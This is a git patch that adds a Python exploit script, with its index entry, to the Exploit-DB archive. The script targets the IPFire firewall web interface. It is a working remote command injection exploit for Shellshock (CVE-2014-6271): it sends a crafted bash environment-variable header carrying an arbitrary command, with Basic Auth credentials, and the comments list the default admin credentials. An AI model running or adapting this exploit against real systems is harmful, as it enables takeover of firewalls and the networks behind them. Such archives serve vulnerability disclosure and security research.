From 63098d36da34af61b16b4c70caa4dd36eb8c82df Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 6 Oct 2014 04:44:51 +0000
Subject: [PATCH] Updated 10_06_2014

---
 files.csv                      |   1 +
 platforms/cgi/webapps/34839.py | 146 +++++++++++++++++++++++++++++++++
 2 files changed, 147 insertions(+)
 create mode 100755 platforms/cgi/webapps/34839.py

diff --git a/files.csv b/files.csv
index b8189da05..56f381afb 100755
--- a/files.csv
+++ b/files.csv
@@ -31367,6 +31367,7 @@ id,file,description,date,author,platform,type,port
 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
 34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0
 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0
+34839,platforms/cgi/webapps/34839.py,"IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit",2014-10-01,"Claudio Viviani",cgi,webapps,0
 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
 34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
 34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0
diff --git a/platforms/cgi/webapps/34839.py b/platforms/cgi/webapps/34839.py
new file mode 100755
index 000000000..152458ad3
--- /dev/null
+++ b/platforms/cgi/webapps/34839.py
@@ -0,0 +1,146 @@
+#!/usr/bin/env python
+#
+# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
+#
+# Exploit Author : Claudio Viviani
+#
+# Vendor Homepage : http://www.ipfire.org
+#
+# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
+#
+# Date : 2014-09-29
+#
+# Fixed version: IPFire 2.15 core 83 (2014-09-28)
+#
+# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
+#       It can be maintained via a web interface.
+#       The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
+#       IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
+#
+# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
+#                (CVE-2014-6271)
+#
+# Suggestion:
+#
+# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
+# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
+#
+#
+# http connection
+import urllib2
+# Basic Auth management Base64
+import base64
+# Args management
+import optparse
+# Error management
+import sys
+
+banner = """
+       ___ _______ _______ __                _______       __
+      |   |   _   |   _   |__.----.-----.   |   _   .-----|__|
+      |.  |.  1   |.  1___|  |   _|  -__|   |.  1___|  _  |  |
+      |.  |.  ____|.  __) |__|__| |_____|   |.  |___|___  |__|
+      |:  |:  |   |:  |                     |:  1   |_____|
+      |::.|::.|   |::.|                     |::.. . |
+      `---`---'   `---'                     `-------'
+   _______ __          __ __ _______ __               __
+  |   _   |  |--.-----|  |  |   _   |  |--.-----.----|  |--.
+  |   1___|     |  -__|  |  |   1___|     |  _  |  __|    <
+  |____   |__|__|_____|__|__|____   |__|__|_____|____|__|__|
+  |:  1   |                 |:  1   |
+  |::.. . |                 |::.. . |
+  `-------'                 `-------'
+
+                                IPFire <= 2.15 c0re 82 Authenticated
+                                Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
+
+                          Written by:
+
+                        Claudio Viviani
+
+                     http://www.homelab.it
+
+                        info@homelab.it
+                    homelabit@protonmail.ch
+
+               https://www.facebook.com/homelabit
+                  https://twitter.com/homelabit
+               https://plus.google.com/+HomelabIt1/
+     https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+# Check url
+def checkurl(url):
+    if url[:8] != "https://" and url[:7] != "http://":
+        print('[X] You must insert http:// or https:// procotol')
+        sys.exit(1)
+    else:
+        return url
+
+def connectionScan(url,user,pwd,cmd):
+    print '[+] Connection in progress...'
+    try:
+        response = urllib2.Request(url)
+        content = urllib2.urlopen(response)
+        print '[X] IPFire Basic Authentication not found'
+    except urllib2.HTTPError, e:
+        if e.code == 404:
+            print '[X] Page not found'
+        elif e.code == 401:
+            try:
+                print '[+] Authentication in progress...'
+                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
+                headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
+                response = urllib2.Request(url, None, headers)
+                response.add_header("Authorization", "Basic %s" % base64string)
+                content = urllib2.urlopen(response).read()
+                if "ipfire" in content:
+                    print '[+] Username & Password: OK'
+                    print '[+] Checking for vulnerability...'
+                    if 'H0m3l4b1t' in  content:
+                        print '[!] Command "'+cmd+'": INJECTED!'
+                    else:
+                        print '[X] Not Vulnerable :('
+                else:
+                     print '[X] No IPFire page found'
+            except urllib2.HTTPError, e:
+                if e.code == 401:
+                   print '[X] Wrong username or password'
+                else:
+                   print '[X] HTTP Error: '+str(e.code)
+            except urllib2.URLError:
+                print '[X] Connection Error'
+        else:
+            print '[X] HTTP Error: '+str(e.code)
+    except urllib2.URLError:
+        print '[X] Connection Error'
+
+commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
+commandList.add_option('-t', '--target', action="store",
+                  help="Insert TARGET URL",
+                  )
+commandList.add_option('-c', '--cmd', action="store",
+                  help="Insert command name",
+                  )
+commandList.add_option('-u', '--user', action="store",
+                  help="Insert username",
+                  )
+commandList.add_option('-p', '--pwd', action="store",
+                  help="Insert password",
+                  )
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target or not options.cmd or not options.user or not options.pwd:
+    print(banner)
+    commandList.print_help()
+    sys.exit(1)
+
+print(banner)
+
+url = checkurl(options.target)
+cmd = options.cmd
+user = options.user
+pwd = options.pwd
+
+connectionScan(url,user,pwd,cmd)